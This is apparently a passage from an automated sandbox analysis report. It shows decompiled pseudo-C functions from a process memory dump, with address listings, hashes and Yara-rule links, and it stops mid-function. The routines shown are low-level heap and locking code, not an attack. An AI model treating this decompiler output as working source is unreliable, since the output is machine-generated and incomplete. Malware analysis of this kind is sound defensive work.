                        0x02b2a741
                        0x02b2a741
                        0x02b2a743
                        0x02b2a749
                        0x02b2a749
                        0x02b2a732
                        0x02b2a73a
                        0x02b2a797
                        0x02b2a79d
                        0x02b2a7a3
                        0x02b2a7a9
                        0x02b2a7b6
                        0x02b2a7bc
                        0x02b2a7ca
                        0x02b2a7e0
                        0x02b2a7e2
                        0x02b2a7e4
                        0x02b69bf2
                        0x00000000
                        0x02b69bf2
                        0x02b2a7ed
                        0x02b2a7f2
                        0x02b2a800
                        0x02b2a805
                        0x02b2a80d
                        0x02b2a812
                        0x02b69c08
                        0x02b69c08
                        0x02b2a818
                        0x02b2a81b
                        0x02b2a821
                        0x02b2a824
                        0x00000000
                        0x02b2a824
                        0x02b2a7ae
                        0x00000000
                        0x02b2a7ae
                        0x02b2a73c
                        0x02b2a73e
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e83e462d513372f930e2b515ce818cca63af18c06b26238626bd3040e519c15b
                        • Instruction ID: 83f906b9d3da0f8382add0721f7b364c4bb03be1843810cc3842ffeda6df8ea5
                        • Opcode Fuzzy Hash: e83e462d513372f930e2b515ce818cca63af18c06b26238626bd3040e519c15b
                        • Instruction Fuzzy Hash: 4F31AFB1A60211DBDB11CB28E8A0F65B7F9FF84750F144DDAE0099B250DB70A915DB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02AFAA16, Relevance: .1, Instructions: 93COMMON
                        Download Yara Rule
                        C-Code - Quality: 95%
                        			E02AFAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x2bed360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x2be7b9c; // 0x0
					_t53 = L02B14620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E02B3B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E02B3F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L02B06C59(_t53, _t51, _t58) != 0) {
							_t28 = E02B25E50(0x2adc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E02B2B230(_v32, _v28, 0x2adc2d8, 1,  &_v24);
								_t28 = E02AFF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                        0x02afaa25
                        0x02afaa29
                        0x02afaa2d
                        0x02afaa30
                        0x02afaa37
                        0x02afaa3c
                        0x02b54458
                        0x02b54458
                        0x02b54472
                        0x02b54474
                        0x02b54476
                        0x02afaa64
                        0x02afaa74
                        0x02b5447c
                        0x02b54483
                        0x02b54492
                        0x02afaa52
                        0x02afaa54
                        0x02afaa5e
                        0x02b544a8
                        0x02b544ad
                        0x02b544af
                        0x02b544b6
                        0x02b544b6
                        0x02b544b9
                        0x02b544bc
                        0x02b544cd
                        0x02b544d3
                        0x02b544d6
                        0x02b544e1
                        0x02b544e1
                        0x02b544e6
                        0x02b544e8
                        0x02b544fb
                        0x02b544fb
                        0x02b544e8
                        0x00000000
                        0x02afaa5e
                        0x02b54476
                        0x02afaa42
                        0x02afaa46
                        0x02afaa48
                        0x02afaa4c
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 58936e503ab63e2dc72662ee33a566717edef38852f70a95c9903f9f14dc0b68
                        • Instruction ID: 0f71b02a74e4358069407af2e6a720e5e3e520a7704a356356c293bbc7f8e734
                        • Opcode Fuzzy Hash: 58936e503ab63e2dc72662ee33a566717edef38852f70a95c9903f9f14dc0b68
                        • Instruction Fuzzy Hash: 6031D671940229EBCF11AFA4CD81ABFB7B9EF04700B4444A9F905DB250EB749950DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B261A0, Relevance: .1, Instructions: 93COMMON
                        Download Yara Rule
                        C-Code - Quality: 97%
                        			E02B261A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E02B25E50(0x2ad67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E02BC9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E02AFF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                        0x02b261b3
                        0x02b261b5
                        0x02b261bd
                        0x02b261c3
                        0x02b261c7
                        0x02b261d2
                        0x02b261ff
                        0x02b261ff
                        0x02b26201
                        0x02b26207
                        0x02b26207
                        0x02b261d4
                        0x02b261d9
                        0x00000000
                        0x00000000
                        0x02b261df
                        0x02b261e2
                        0x00000000
                        0x00000000
                        0x02b261e6
                        0x02b261e8
                        0x02b261ee
                        0x02b261ee
                        0x02b261f9
                        0x02b6762f
                        0x02b67632
                        0x02b67635
                        0x02b67639
                        0x02b67640
                        0x02b6766e
                        0x02b67675
                        0x00000000
                        0x00000000
                        0x02b67681
                        0x02b67689
                        0x02b6768d
                        0x02b67691
                        0x02b67695
                        0x02b67699
                        0x02b676af
                        0x02b676b5
                        0x02b676b7
                        0x02b676b7
                        0x02b676d7
                        0x02b676dc
                        0x00000000
                        0x02b676dc
                        0x02b676a2
                        0x02b676a9
                        0x02b67651
                        0x02b67653
                        0x02b67653
                        0x02b67656
                        0x02b67656
                        0x00000000
                        0x02b67656
                        0x02b67644
                        0x02b67646
                        0x02b67648
                        0x02b67648
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 921dc4d546101be5ae9b8f8c1f1ebfd3014e22bb9ae7682c514ff3f6042494b2
                        • Instruction ID: 21a2d5704eaf85602c2aac89f5cac637f282c8d491a7892e1f2cfb9c26298e02
                        • Opcode Fuzzy Hash: 921dc4d546101be5ae9b8f8c1f1ebfd3014e22bb9ae7682c514ff3f6042494b2
                        • Instruction Fuzzy Hash: D031AF71A057218FD320CF09C804B26F7E9FB88B08F1549ADE89897351EB74E844CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B34A2C, Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        C-Code - Quality: 58%
                        			E02B34A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x2bed360 ^ _t62;
				_v8 =  *0x2bed360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E02B12280(_t26, 0x2be8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E02B0FFB0(_t41, _t51, 0x2be8608);
						L2:
						 *0x2beb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E02B3B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E02B12280(_t28, 0x2be8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E02B0FFB0(_t42, _t53, 0x2be8608);
							if(_t53 != 0) {
								L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E02B0FFB0(_t41, _t51, 0x2be8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                        0x02b34a2c
                        0x02b34a34
                        0x02b34a3c
                        0x02b34a3e
                        0x02b34a48
                        0x02b34a4b
                        0x02b34a4d
                        0x02b34a51
                        0x02b34a9c
                        0x00000000
                        0x00000000
                        0x02b34aa3
                        0x02b34aa8
                        0x02b34aad
                        0x02b34ab1
                        0x02b34ade
                        0x02b34ae3
                        0x02b34a5a
                        0x02b34a62
                        0x02b34a6a
                        0x02b34a6e
                        0x02b6f203
                        0x02b34a84
                        0x02b34a88
                        0x02b34a89
                        0x02b34a8a
                        0x02b34a95
                        0x02b34a95
                        0x02b34a79
                        0x02b34a80
                        0x02b34af2
                        0x02b34af4
                        0x02b34af9
                        0x02b34aff
                        0x02b34b01
                        0x02b34b03
                        0x02b34b08
                        0x02b6f20a
                        0x02b6f212
                        0x02b6f216
                        0x02b6f216
                        0x02b34b08
                        0x02b34b13
                        0x02b34b1a
                        0x02b6f229
                        0x02b6f229
                        0x02b34b1a
                        0x02b34a82
                        0x00000000
                        0x02b34a82
                        0x02b34ab7
                        0x02b34acd
                        0x02b34acd
                        0x02b34ad5
                        0x02b34ada
                        0x00000000
                        0x02b34ada
                        0x02b34ac2
                        0x02b34acb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b34acb
                        0x02b34a53
                        0x02b34a53
                        0x02b34a58
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 391541c12a4a2111ad7c0b3331c18eb3fad0a0cc8aebfd4c62c5a765417821fc
                        • Instruction ID: e436d306b804deb3be778e6e2ad0d4223b582fd39e15f24cf8dca8eb571d8b0d
                        • Opcode Fuzzy Hash: 391541c12a4a2111ad7c0b3331c18eb3fad0a0cc8aebfd4c62c5a765417821fc
                        • Instruction Fuzzy Hash: EC31DF322056509FDB329F14C984B2ABBB5FF81B14F4045E9E8A74B660CBB0E804DF85
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B38EC7, Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E02B38EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x2bed360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E02B24E70(0x2be86e4, 0x2b39490, 0, 0);
					if( *0x2be53e8 > 5 && E02B38F33(0x2be53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x2be53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x2be53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x2adbc46;
						_t48 = E02B77B9C(0x2be53e8, 0x2adbc46, _t67, 0x2be53e8, _t70,  &_v140);
					}
				}
				return E02B3B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                        0x02b38ec7
                        0x02b38ed9
                        0x02b38edc
                        0x02b38ee6
                        0x02b38ee9
                        0x02b38eee
                        0x02b38efc
                        0x02b38f08
                        0x02b71349
                        0x02b71353
                        0x02b7135d
                        0x02b71366
                        0x02b7136f
                        0x02b71375
                        0x02b7137c
                        0x02b71385
                        0x02b71390
                        0x02b71391
                        0x02b7139c
                        0x02b7139d
                        0x02b713a6
                        0x02b713ac
                        0x02b713b2
                        0x02b713b5
                        0x02b713bc
                        0x02b713bf
                        0x02b713c2
                        0x02b713c5
                        0x02b713c8
                        0x02b713cb
                        0x02b713ce
                        0x02b713d1
                        0x02b713d4
                        0x02b713d7
                        0x02b713da
                        0x02b713dd
                        0x02b713e0
                        0x02b713e3
                        0x02b713e6
                        0x02b713e9
                        0x02b713f6
                        0x02b71400
                        0x02b71400
                        0x02b38f08
                        0x02b38f32

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 342574146abbc06357c88c0abb336978e4e1b43e3a1d7e31d56adfd3118c18ba
                        • Instruction ID: 722536487b90d5cb7bf18d58e84438d9765db85eb475720425f2c70d83bffe00
                        • Opcode Fuzzy Hash: 342574146abbc06357c88c0abb336978e4e1b43e3a1d7e31d56adfd3118c18ba
                        • Instruction Fuzzy Hash: 4C4193B1D003189EDB24CFAAD980AADFBF5FB48310F5081AEE519A7600DB709A84CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B2E730, Relevance: .1, Instructions: 89COMMON
                        Download Yara Rule
                        C-Code - Quality: 74%
                        			E02B2E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E02B39670() < 0) {
					L02B4DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x2be7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L02B14620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M02B2E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                        0x02b2e730
                        0x02b2e736
                        0x02b2e738
                        0x02b2e73d
                        0x02b2e73e
                        0x02b2e740
                        0x02b2e749
                        0x02b2e765
                        0x02b2e76a
                        0x02b2e76b
                        0x02b2e76c
                        0x02b2e76d
                        0x02b2e76e
                        0x02b2e76f
                        0x02b2e775
                        0x02b2e777
                        0x02b2e77e
                        0x02b6b675
                        0x02b2e784
                        0x02b2e784
                        0x02b2e789
                        0x02b2e7a8
                        0x02b2e7ac
                        0x02b2e807
                        0x02b2e7ae
                        0x02b2e7ae
                        0x02b2e7b1
                        0x02b2e7b4
                        0x02b2e7b9
                        0x02b2e7c0
                        0x02b2e7c4
                        0x02b2e7ca
                        0x02b2e7cc
                        0x00000000
                        0x02b2e7d3
                        0x02b2e7d6
                        0x00000000
                        0x00000000
                        0x02b2e7ff
                        0x02b2e802
                        0x00000000
                        0x00000000
                        0x02b2e7f9
                        0x02b2e7fc
                        0x00000000
                        0x00000000
                        0x02b2e7f3
                        0x02b2e7f6
                        0x00000000
                        0x00000000
                        0x02b2e7ed
                        0x02b2e7f0
                        0x00000000
                        0x00000000
                        0x02b2e7e7
                        0x02b2e7ea
                        0x00000000
                        0x00000000
                        0x02b6b685
                        0x02b6b688
                        0x00000000
                        0x00000000
                        0x02b6b682
                        0x00000000
                        0x00000000
                        0x02b2e7cc
                        0x02b2e7d9
                        0x02b2e7dc
                        0x02b2e7de
                        0x02b2e7de
                        0x02b2e7ac
                        0x02b2e7e4
                        0x02b2e74b
                        0x02b2e751
                        0x02b2e759
                        0x02b2e761
                        0x02b2e761

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e3f1c6b9c546025657e7f506b199c20ec28064430973c1473c00618c9dfd1285
                        • Instruction ID: 01299d9e423261350e461aad1de54541aefd3926de4cdf110de7d3ec7c4a5d91
                        • Opcode Fuzzy Hash: e3f1c6b9c546025657e7f506b199c20ec28064430973c1473c00618c9dfd1285
                        • Instruction Fuzzy Hash: 38318C75A14249AFD704CF29D840B9AB7E4FB08314F1482A6FA08CB351D631E894CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B2BC2C, Relevance: .1, Instructions: 88COMMON
                        Download Yara Rule
                        C-Code - Quality: 67%
                        			E02B2BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x2be6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E02B12280(0xd, 0xdb7f1a0);
				_t41 =  *0x2be60f8; // 0x0
				if(_t41 != 0) {
					 *0x2be60f8 =  *_t41;
					 *0x2be60fc =  *0x2be60fc + 0xffff;
				}
				E02B0FFB0(_t41, 0x800, 0xdb7f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x2be60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L02B14620(0x2be6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x2be6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                        0x02b2bc36
                        0x02b2bc42
                        0x02b2bc45
                        0x02b2bc4a
                        0x02b2bd35
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b2bc50
                        0x02b2bc50
                        0x02b2bc58
                        0x02b2bc5a
                        0x02b2bc60
                        0x00000000
                        0x00000000
                        0x02b6a4f2
                        0x02b6a4f6
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b6a4fc
                        0x02b2bc79
                        0x02b2bc7e
                        0x02b2bc86
                        0x02b2bd16
                        0x02b2bd20
                        0x02b2bd20
                        0x02b2bc8d
                        0x02b2bc94
                        0x02b2bcbd
                        0x02b2bcca
                        0x02b2bccb
                        0x02b2bccc
                        0x02b2bccd
                        0x02b2bcce
                        0x02b2bcd4
                        0x02b2bcea
                        0x02b2bcee
                        0x02b2bcf2
                        0x02b2bd00
                        0x02b2bd04
                        0x00000000
                        0x02b2bc96
                        0x02b2bcab
                        0x02b2bcaf
                        0x02b2bd2c
                        0x02b2bd2c
                        0x02b2bd09
                        0x00000000
                        0x02b2bd09
                        0x02b2bcb1
                        0x02b2bcb5
                        0x02b2bcbb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b2bcbb

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b8544b2deb115bfae5b465aa83b993e98d4f62a6cf6628e63e6f3e6109a78bdf
                        • Instruction ID: f2a0ae81f1034be34475d37831802eede0808734a9b71047c515f85794cfe571
                        • Opcode Fuzzy Hash: b8544b2deb115bfae5b465aa83b993e98d4f62a6cf6628e63e6f3e6109a78bdf
                        • Instruction Fuzzy Hash: B231DF72A00725DBCF11DF58C4C0BA673A9EB28358F0448B9ED49DF202EB74D94ACB80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02AF9100, Relevance: .1, Instructions: 87COMMON
                        Download Yara Rule
                        C-Code - Quality: 76%
                        			E02AF9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x2bcf6e8);
				E02B4D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E02BC88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E02B4D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x2be86c0; // 0x6007b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x2be86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E02B12280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
